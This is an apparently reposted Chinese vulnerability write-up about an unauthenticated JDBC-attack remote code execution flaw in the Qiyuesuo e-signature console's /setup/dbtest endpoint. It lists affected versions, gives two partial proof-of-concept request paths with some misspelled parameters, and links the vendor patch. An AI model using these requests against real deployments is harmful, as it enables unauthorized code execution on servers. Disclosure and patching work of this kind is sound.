【已复现】契约锁电子签章系统远程代码执行漏洞

admin 2025年7月9日01:50:02评论0 views字数 940阅读3分8秒阅读模式
免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责作者不为此承担任何责任,一旦造成后果请自行负责

契约锁分为三块服务:电子签约签署平台、电子签约管理控制台、电子签约开放平台,下面分析的漏洞是来自于电子签约管理控制台

com.qiyuesuo.config.ConsoleConfiguration 这个类有定义前台不需要鉴权的接口,其中就包含了此次漏洞的接口 /setup/dbtest

影响版本:

4.3.8 <= 契约锁 <= 5.3.x && 补丁版本 < 2.1.5

4.0.x <= 契约锁 <= 4.3.7 && 补丁版本 < 1.3.5

漏洞成因:

该漏洞源于电子签章系统在处理用户提交的特定格式数据时,输入验证和执行逻辑存在缺陷,导致安全防护机制被绕过。攻击者利用这一缺陷,通过精心构造的恶意请求,在服务器上注入并执行任意系统命令。契约锁电子签约管理控制台存在JDBC Attack漏洞,攻击者可利用该漏洞实现远程代码执行(Postgresql Jdbc Connection to RCE)

漏洞复现:

fofa语句搜索

【已复现】契约锁电子签章系统远程代码执行漏洞

这里我们利用数据化初始连接文件进行修改,将数据库连接的参数修改为在接口对数据库的内容进行查询

【已复现】契约锁电子签章系统远程代码执行漏洞

poc

/api/setup/dbtest?db=MYSQL&host=127.0.0.1%3A3308%2Ftest%3FallowLoadLocallnfile%3Dtrue%26allowUrllnLocallnfile%3D

或者

/api/setup/dbtest?db=POSTGRESQL&host=localhost&port=5511&username=root&name=jdbcurl

复现成功

修复意见:

契约锁官方已发布安全补丁,请及时更新安全补丁:下载地址:https://www.qiyuesuo.com/more/security/servicepack

参考文章:

https://xz.aliyun.com/news/18245

原文始发于微信公众号(星络安全实验室):【已复现】契约锁电子签章系统远程代码执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年7月9日01:50:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【已复现】契约锁电子签章系统远程代码执行漏洞http://cn-sec.com/archives/4232871.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息